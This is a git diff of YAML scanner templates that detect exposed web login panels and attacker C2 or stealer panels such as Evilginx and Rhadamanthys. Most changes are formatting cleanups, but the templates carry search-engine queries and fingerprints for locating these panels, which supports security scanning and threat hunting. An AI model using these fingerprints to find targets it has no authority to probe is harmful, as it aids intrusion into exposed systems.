max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 tags: panel,axway,securetransport @@ -25,6 +25,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index d9bbcd7221..420cd2e42c 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -9,11 +9,11 @@ info: - https://www.axway.com/en/products/managed-file-transfer/securetransport classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"ST Web Client" tags: panel,axway,securetransport,webclient diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index d5d42063a0..18c9310dcb 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Axxon Next client" - verified: true tags: panel,axxon,vms,login,detect http: diff --git a/http/exposed-panels/azkaban-web-client.yaml b/http/exposed-panels/azkaban-web-client.yaml index 3c3ae2b269..8d3a5c1991 100644 --- a/http/exposed-panels/azkaban-web-client.yaml +++ b/http/exposed-panels/azkaban-web-client.yaml @@ -24,6 +24,7 @@ http: - type: word words: - 'Azkaban Web Client' + - type: status status: - 200 diff --git a/http/exposed-panels/backpack/backpack-admin-panel.yaml b/http/exposed-panels/backpack/backpack-admin-panel.yaml index d10d6c7bd4..01613c91df 100644 --- a/http/exposed-panels/backpack/backpack-admin-panel.yaml +++ b/http/exposed-panels/backpack/backpack-admin-panel.yaml @@ -8,11 +8,11 @@ info: Laravel Backpack admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Backpack Admin" tags: panel,backpack,admin diff --git a/http/exposed-panels/barracuda-panel.yaml b/http/exposed-panels/barracuda-panel.yaml index 4993072ead..234a2ea642 100644 --- a/http/exposed-panels/barracuda-panel.yaml +++ b/http/exposed-panels/barracuda-panel.yaml @@ -7,9 +7,9 @@ info: description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser. classification: cwe-id: CWE-200 - tags: barracuda,panel,vpn metadata: max-request: 1 + tags: barracuda,panel,vpn http: - method: GET diff --git a/http/exposed-panels/bazarr-login.yaml b/http/exposed-panels/bazarr-login.yaml index 7d007faea3..7cfdc6c170 100644 --- a/http/exposed-panels/bazarr-login.yaml +++ b/http/exposed-panels/bazarr-login.yaml @@ -5,15 +5,15 @@ info: author: r3dg33k severity: info description: Bazarr login page was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.bazarr.media/ - tags: panel,bazarr,login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,bazarr,login http: - method: GET diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index bfc3ad1273..c11d9e9d5c 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -9,7 +9,7 @@ info: - https://www.bedita.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/beego-admin-dashboard.yaml b/http/exposed-panels/beego-admin-dashboard.yaml index 721de91e5e..6bf262c3be 100644 --- a/http/exposed-panels/beego-admin-dashboard.yaml +++ b/http/exposed-panels/beego-admin-dashboard.yaml @@ -13,8 +13,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Beego Admin Dashboard" tags: panel,beego,unauth diff --git a/http/exposed-panels/beyondtrust-login-server.yaml b/http/exposed-panels/beyondtrust-login-server.yaml index 1ee5e64164..933eb87e22 100644 --- a/http/exposed-panels/beyondtrust-login-server.yaml +++ b/http/exposed-panels/beyondtrust-login-server.yaml @@ -9,11 +9,11 @@ info: - https://www.beyondtrust.com/brand classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: beyondtrust,pam,panel metadata: max-request: 1 + tags: beyondtrust,pam,panel http: - method: GET diff --git a/http/exposed-panels/beyondtrust-panel.yaml b/http/exposed-panels/beyondtrust-panel.yaml index 002759fef6..dc299ccfd6 100644 --- a/http/exposed-panels/beyondtrust-panel.yaml +++ b/http/exposed-panels/beyondtrust-panel.yaml @@ -7,7 +7,7 @@ info: description: BeyondTrust login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/bigant-login-panel.yaml b/http/exposed-panels/bigant-login-panel.yaml index 809ea385ac..6851cb08ae 100644 --- a/http/exposed-panels/bigant-login-panel.yaml +++ b/http/exposed-panels/bigant-login-panel.yaml @@ -7,7 +7,7 @@ info: description: BigAnt admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/bigbluebutton-login.yaml b/http/exposed-panels/bigbluebutton-login.yaml index 6fff330bb1..b5a4000d8e 100644 --- a/http/exposed-panels/bigbluebutton-login.yaml +++ b/http/exposed-panels/bigbluebutton-login.yaml @@ -9,9 +9,9 @@ info: - https://github.com/bigbluebutton/greenlight classification: cwe-id: CWE-200 - tags: panel,bigbluebutton metadata: max-request: 1 + tags: panel,bigbluebutton http: - method: GET diff --git a/http/exposed-panels/bigfix-login.yaml b/http/exposed-panels/bigfix-login.yaml index 18f03cf48e..faf1f43a15 100644 --- a/http/exposed-panels/bigfix-login.yaml +++ b/http/exposed-panels/bigfix-login.yaml @@ -5,12 +5,12 @@ info: author: idealphase severity: info description: HCL BigFix login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.hcltechsw.com/bigfix + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"BigFix" diff --git a/http/exposed-panels/bigip-rest-panel.yaml b/http/exposed-panels/bigip-rest-panel.yaml index ed6be3d5a8..37659cbf07 100644 --- a/http/exposed-panels/bigip-rest-panel.yaml +++ b/http/exposed-panels/bigip-rest-panel.yaml @@ -5,15 +5,15 @@ info: author: MrCl0wnLab severity: info description: | - F5 BIG-IP iControl REST API discovered and may be vulnerable to an authentication bypass (not tested). - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 + F5 BIG-IP iControl REST API discovered and may be vulnerable to an authentication bypass (not tested). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-1388 - https://support.f5.com/csp/article/K23605346 - https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" diff --git a/http/exposed-panels/biotime-panel.yaml b/http/exposed-panels/biotime-panel.yaml index 0faa1ac4d5..d5d3e340f0 100644 --- a/http/exposed-panels/biotime-panel.yaml +++ b/http/exposed-panels/biotime-panel.yaml @@ -7,11 +7,11 @@ info: description: BioTime Web login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"BioTime" tags: panel,biotime @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/bitdefender-gravityzone.yaml b/http/exposed-panels/bitdefender-gravityzone.yaml index 3b45c3d1db..01d6cfb442 100644 --- a/http/exposed-panels/bitdefender-gravityzone.yaml +++ b/http/exposed-panels/bitdefender-gravityzone.yaml @@ -7,11 +7,11 @@ info: description: Bitdefender GravityZone panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Bitdefender GravityZone" tags: panel,bitdefender diff --git a/http/exposed-panels/bitrix-panel.yaml b/http/exposed-panels/bitrix-panel.yaml index 1fddf85dd3..e1aed40948 100644 --- a/http/exposed-panels/bitrix-panel.yaml +++ b/http/exposed-panels/bitrix-panel.yaml @@ -7,9 +7,9 @@ info: description: Bitrix24 is a unified work space that places a complete set of business tools into a single, intuitive interface. classification: cwe-id: CWE-200 - tags: panel,bitrix,login metadata: max-request: 1 + tags: panel,bitrix,login http: - method: GET @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/bitwarden-vault-panel.yaml b/http/exposed-panels/bitwarden-vault-panel.yaml index 6a2956474a..dc59b88854 100644 --- a/http/exposed-panels/bitwarden-vault-panel.yaml +++ b/http/exposed-panels/bitwarden-vault-panel.yaml @@ -7,8 +7,8 @@ info: reference: - https://bitwarden.com/?utm_source=google&utm_medium=cpc&utm_campaign=AW_ALL_NU_CL_Bitwarden_en_GSN_DTMB_Brand-Login_KW:Brand-Login_Consolidated&utm_content=646427936792&utm_term=bitwarden%20vault%20login|kwd-826827349840&hsa_acc=2567950947&hsa_cam=19621984700&hsa_grp=145977914135&hsa_ad=646427936792&hsa_src=g&hsa_tgt=kwd-826827349840&hsa_kw=bitwarden%20vault%20login&hsa_mt=e&hsa_net=adwords&hsa_ver=3&gad=1&gclid=Cj0KCQjwpompBhDZARIsAFD_Fp-07Mni-xzuKd5Ewi6I7qzRTdZOYSxMsMVvKVWhGm5qg2KUiY2Z7SQaAvSIEALw_wcB metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Bitwarden Web Vault" tags: panel,bitwarden,vault,detect @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/black-duck-panel.yaml b/http/exposed-panels/black-duck-panel.yaml index 59a599d7c5..0e29660761 100644 --- a/http/exposed-panels/black-duck-panel.yaml +++ b/http/exposed-panels/black-duck-panel.yaml @@ -11,11 +11,11 @@ info: - https://www.synopsys.com/software-integrity/security-testing/software-composition-analysis.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Black Duck" tags: panel,blackduck,synopsys @@ -26,9 +26,9 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - - type: regex part: body regex: diff --git a/http/exposed-panels/bloofoxcms-login-panel.yaml b/http/exposed-panels/bloofoxcms-login-panel.yaml index 9661c30661..17ef25e880 100644 --- a/http/exposed-panels/bloofoxcms-login-panel.yaml +++ b/http/exposed-panels/bloofoxcms-login-panel.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: verified: "true" - fofa-query: "Powered by bloofoxCMS" max-request: 2 + fofa-query: "Powered by bloofoxCMS" tags: panel,bloofox,cms http: @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/admin/index.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/blue-iris-login.yaml b/http/exposed-panels/blue-iris-login.yaml index a1ecd868ac..66ba2ff443 100644 --- a/http/exposed-panels/blue-iris-login.yaml +++ b/http/exposed-panels/blue-iris-login.yaml @@ -10,7 +10,7 @@ info: - https://blueirissoftware.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/bmc/bmc-discovery-panel.yaml b/http/exposed-panels/bmc/bmc-discovery-panel.yaml index 0dec32a941..13c6b137c1 100644 --- a/http/exposed-panels/bmc/bmc-discovery-panel.yaml +++ b/http/exposed-panels/bmc/bmc-discovery-panel.yaml @@ -9,11 +9,11 @@ info: - https://docs.bmc.com/docs/discovery/documentation-home-1098837931.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"BMC Software" tags: panel,bmc diff --git a/http/exposed-panels/bolt-cms-panel.yaml b/http/exposed-panels/bolt-cms-panel.yaml index a777e08a50..f1a46f7e34 100644 --- a/http/exposed-panels/bolt-cms-panel.yaml +++ b/http/exposed-panels/bolt-cms-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/bolt/bolt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,bolt,cms,login metadata: max-request: 1 + tags: panel,bolt,cms,login http: - method: GET diff --git a/http/exposed-panels/bomgar-login-panel.yaml b/http/exposed-panels/bomgar-login-panel.yaml index 4bc3322494..72fd1cd299 100644 --- a/http/exposed-panels/bomgar-login-panel.yaml +++ b/http/exposed-panels/bomgar-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Bomgar Login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,bomgar,beyondtrust metadata: max-request: 2 + tags: panel,bomgar,beyondtrust http: - method: GET @@ -20,9 +20,9 @@ http: - "{{BaseURL}}/appliance/login.ns" stop-at-first-match: true + matchers-condition: or matchers: - - type: dsl dsl: - "status_code==200" diff --git a/http/exposed-panels/bookstack-panel.yaml b/http/exposed-panels/bookstack-panel.yaml index 89f37eeabc..4e47d3136c 100644 --- a/http/exposed-panels/bookstack-panel.yaml +++ b/http/exposed-panels/bookstack-panel.yaml @@ -9,7 +9,7 @@ info: - https://github.com/BookStackApp/BookStack classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/buddy-panel.yaml b/http/exposed-panels/buddy-panel.yaml index 96d2cc0d13..ec3fd3278f 100644 --- a/http/exposed-panels/buddy-panel.yaml +++ b/http/exposed-panels/buddy-panel.yaml @@ -9,7 +9,7 @@ info: - https://buddy.works classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/buildbot-panel.yaml b/http/exposed-panels/buildbot-panel.yaml index 55995b2edc..09dbd1009f 100644 --- a/http/exposed-panels/buildbot-panel.yaml +++ b/http/exposed-panels/buildbot-panel.yaml @@ -9,11 +9,11 @@ info: - https://buildbot.net classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"BuildBot" tags: panel,buildbot,cicd @@ -24,6 +24,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/exposed-panels/c2/brute-ratel-c4.yaml b/http/exposed-panels/c2/brute-ratel-c4.yaml index abd400f2d8..6181371b01 100644 --- a/http/exposed-panels/c2/brute-ratel-c4.yaml +++ b/http/exposed-panels/c2/brute-ratel-c4.yaml @@ -9,9 +9,9 @@ info: reference: - https://bruteratel.com/ metadata: + verified: "true" max-request: 1 shodan-query: http.html_hash:-1957161625 - verified: "true" tags: c2,bruteratel,c4,panel http: diff --git a/http/exposed-panels/c2/covenant-c2.yaml b/http/exposed-panels/c2/covenant-c2.yaml index 557d721e0d..f0d4f0a38b 100644 --- a/http/exposed-panels/c2/covenant-c2.yaml +++ b/http/exposed-panels/c2/covenant-c2.yaml @@ -9,8 +9,8 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ssl:”Covenant” http.component:”Blazor” tags: c2,ir,osint,covenant,panel diff --git a/http/exposed-panels/c2/deimos-c2.yaml b/http/exposed-panels/c2/deimos-c2.yaml index 192448d3d3..e607a16fae 100644 --- a/http/exposed-panels/c2/deimos-c2.yaml +++ b/http/exposed-panels/c2/deimos-c2.yaml @@ -9,8 +9,8 @@ info: reference: | https://twitter.com/MichalKoczwara/status/1551632627387473920 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html_hash:-14029177 tags: c2,ir,osint,deimosc2,panel diff --git a/http/exposed-panels/c2/empire-c2.yaml b/http/exposed-panels/c2/empire-c2.yaml index 897f3be83e..097a619d12 100644 --- a/http/exposed-panels/c2/empire-c2.yaml +++ b/http/exposed-panels/c2/empire-c2.yaml @@ -10,9 +10,9 @@ info: - https://github.com/thehappydinoa/awesome-censys-queries#security-applications - https://bc-security.gitbook.io/empire-wiki/ metadata: - censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc - max-request: 1 verified: "true" + max-request: 1 + censys-query: bc517bf173440dad15b99a051389fadc366d5df2 || dcb32e6256459d3660fdc90e4c79e95a921841cc tags: c2,ir,osint,empire,panel http: diff --git a/http/exposed-panels/c2/evilginx.yaml b/http/exposed-panels/c2/evilginx.yaml index abe70080a3..0dd08d20bc 100644 --- a/http/exposed-panels/c2/evilginx.yaml +++ b/http/exposed-panels/c2/evilginx.yaml @@ -9,9 +9,9 @@ info: reference: - https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/delivery/evilginx metadata: - censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d - max-request: 1 verified: "true" + max-request: 1 + censys-query: b18d778b4e4b6bf1fd5b2d790c941270145a6a6d tags: tech,evilginx,c2,phishing,panel http: @@ -25,4 +25,4 @@ http: dsl: - "status_code == 200 && contains(body, 'Evilginx')" - "(\"b18d778b4e4b6bf1fd5b2d790c941270145a6a6d\" == sha1(body))" - condition: and \ No newline at end of file + condition: and diff --git a/http/exposed-panels/c2/hookbot-rat.yaml b/http/exposed-panels/c2/hookbot-rat.yaml index 37d50d8131..2b6989e17c 100644 --- a/http/exposed-panels/c2/hookbot-rat.yaml +++ b/http/exposed-panels/c2/hookbot-rat.yaml @@ -7,9 +7,9 @@ info: description: | Hookbot panel were detected. metadata: + verified: true max-request: 1 shodan-query: title:"hookbot" - verified: true tags: tech,rat,hookbot,c2,panel,detect http: diff --git a/http/exposed-panels/c2/mystic-stealer.yaml b/http/exposed-panels/c2/mystic-stealer.yaml index 40abb76172..17ddb77f36 100644 --- a/http/exposed-panels/c2/mystic-stealer.yaml +++ b/http/exposed-panels/c2/mystic-stealer.yaml @@ -7,9 +7,9 @@ info: description: | Mystic Stealer panel were detected. metadata: + verified: "true" max-request: 1 shodan-query: http.title:"Mystic Stealer" - verified: "true" tags: tech,rat,mystic-stealer,c2,panel http: @@ -22,4 +22,4 @@ http: - type: dsl dsl: - "status_code == 200 && contains(body, 'Mystic Stealer')" - condition: and \ No newline at end of file + condition: and diff --git a/http/exposed-panels/c2/mythic-c2.yaml b/http/exposed-panels/c2/mythic-c2.yaml index c413d05414..3e76876b6d 100644 --- a/http/exposed-panels/c2/mythic-c2.yaml +++ b/http/exposed-panels/c2/mythic-c2.yaml @@ -10,8 +10,8 @@ info: reference: | https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'ssl:Mythic port:7443' tags: c2,ir,osint,mythic,panel diff --git a/http/exposed-panels/c2/nh-c2.yaml b/http/exposed-panels/c2/nh-c2.yaml index d1d835ec5e..379959c627 100644 --- a/http/exposed-panels/c2/nh-c2.yaml +++ b/http/exposed-panels/c2/nh-c2.yaml @@ -7,9 +7,9 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1616179246216396806 metadata: - censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 - max-request: 1 verified: "true" + max-request: 1 + censys-query: 10baf5fcdde4563d3e145a1f553ae433fb1c3572 tags: tech,nh,c2,panel http: @@ -23,4 +23,4 @@ http: dsl: - "status_code == 301 && status_code == 302" - "(\"03609e8e4a0a0ef888327d64ae2dc8950664219e\" == sha1(body))" - condition: and \ No newline at end of file + condition: and diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 64f504f01a..35abebe865 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,8 +8,8 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: - max-request: 1 verified: true + max-request: 1 tags: c2,rhadamanthys,stealer,panel http: @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/admin/console/index.html" host-redirects: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/c2/viper-c2.yaml b/http/exposed-panels/c2/viper-c2.yaml index e83c230a8b..3884166144 100644 --- a/http/exposed-panels/c2/viper-c2.yaml +++ b/http/exposed-panels/c2/viper-c2.yaml @@ -9,10 +9,10 @@ info: reference: - https://twitter.com/MichalKoczwara/status/1635724410274414596 metadata: - censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 + verified: "true" max-request: 1 shodan-query: http.html_hash:1015055567 - verified: "true" + censys-query: 057f3b5488605b4d224d038e340866e2cdfed4a3 tags: tech,viper,c2,malware,ir,panel http: diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 081655db95..fc53f31c63 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -9,11 +9,11 @@ info: - https://www.cacti.net/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,cacti,login,panel metadata: max-request: 2 + tags: tech,cacti,login,panel http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/cacti/" stop-at-first-match: true + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/calendarix-panel.yaml b/http/exposed-panels/calendarix-panel.yaml index e2aeecf980..e7fa78b0f5 100644 --- a/http/exposed-panels/calendarix-panel.yaml +++ b/http/exposed-panels/calendarix-panel.yaml @@ -7,11 +7,11 @@ info: description: Calendarix admin login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,calendarix,login metadata: max-request: 2 + tags: panel,calendarix,login http: - method: GET @@ -24,6 +24,7 @@ http: - type: status status: - 200 + - type: word words: - 'Calendarix Admin Login' diff --git a/http/exposed-panels/call-break-cms.yaml b/http/exposed-panels/call-break-cms.yaml index 1aba0f1caf..5a02616616 100644 --- a/http/exposed-panels/call-break-cms.yaml +++ b/http/exposed-panels/call-break-cms.yaml @@ -7,11 +7,11 @@ info: description: Call Break CMS panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET diff --git a/http/exposed-panels/camunda-login-panel.yaml b/http/exposed-panels/camunda-login-panel.yaml index f9395b88c3..36a5ace9e5 100644 --- a/http/exposed-panels/camunda-login-panel.yaml +++ b/http/exposed-panels/camunda-login-panel.yaml @@ -9,11 +9,11 @@ info: - https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: camunda,panel,login metadata: max-request: 2 + tags: camunda,panel,login http: - method: GET @@ -23,10 +23,10 @@ http: matchers-condition: and matchers: - - type: word words: - "Camunda Welcome" + - type: status status: - 200 diff --git a/http/exposed-panels/cas-login.yaml b/http/exposed-panels/cas-login.yaml index 7ebf2dca51..1b0ab3ac36 100644 --- a/http/exposed-panels/cas-login.yaml +++ b/http/exposed-panels/cas-login.yaml @@ -7,7 +7,7 @@ info: description: CAS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/casaos-panel.yaml b/http/exposed-panels/casaos-panel.yaml index 60a763320a..cb9271c13f 100644 --- a/http/exposed-panels/casaos-panel.yaml +++ b/http/exposed-panels/casaos-panel.yaml @@ -7,11 +7,11 @@ info: description: CasaOS login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"CasaOS" tags: panel,casaos,login,detect @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/casdoor-login.yaml b/http/exposed-panels/casdoor-login.yaml index c62caf99ca..d43740a14f 100644 --- a/http/exposed-panels/casdoor-login.yaml +++ b/http/exposed-panels/casdoor-login.yaml @@ -9,7 +9,7 @@ info: - https://casdoor.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -23,7 +23,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/casemanager-panel.yaml b/http/exposed-panels/casemanager-panel.yaml index ba63f4741d..019646e486 100644 --- a/http/exposed-panels/casemanager-panel.yaml +++ b/http/exposed-panels/casemanager-panel.yaml @@ -7,7 +7,7 @@ info: description: CaseManager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/caton-network-manager-system.yaml b/http/exposed-panels/caton-network-manager-system.yaml index e53bb208fb..21dae61664 100644 --- a/http/exposed-panels/caton-network-manager-system.yaml +++ b/http/exposed-panels/caton-network-manager-system.yaml @@ -7,11 +7,11 @@ info: description: Caton Network Manager System login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Caton Network Manager System" tags: caton,manager,login,panel diff --git a/http/exposed-panels/ccm-detect.yaml b/http/exposed-panels/ccm-detect.yaml index 2205050dcb..e0fed06f75 100644 --- a/http/exposed-panels/ccm-detect.yaml +++ b/http/exposed-panels/ccm-detect.yaml @@ -1,4 +1,5 @@ id: ccm-detect + info: name: Clear-Com Core Configuration Manager Panel - Detect author: failOpen @@ -8,11 +9,11 @@ info: - https://www.clearcom.com/DownloadCenter/manuals/FreeSpeakII_Online_Manual/UserGuide/Content/Base/CCM/CCM.htm classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"CCM - 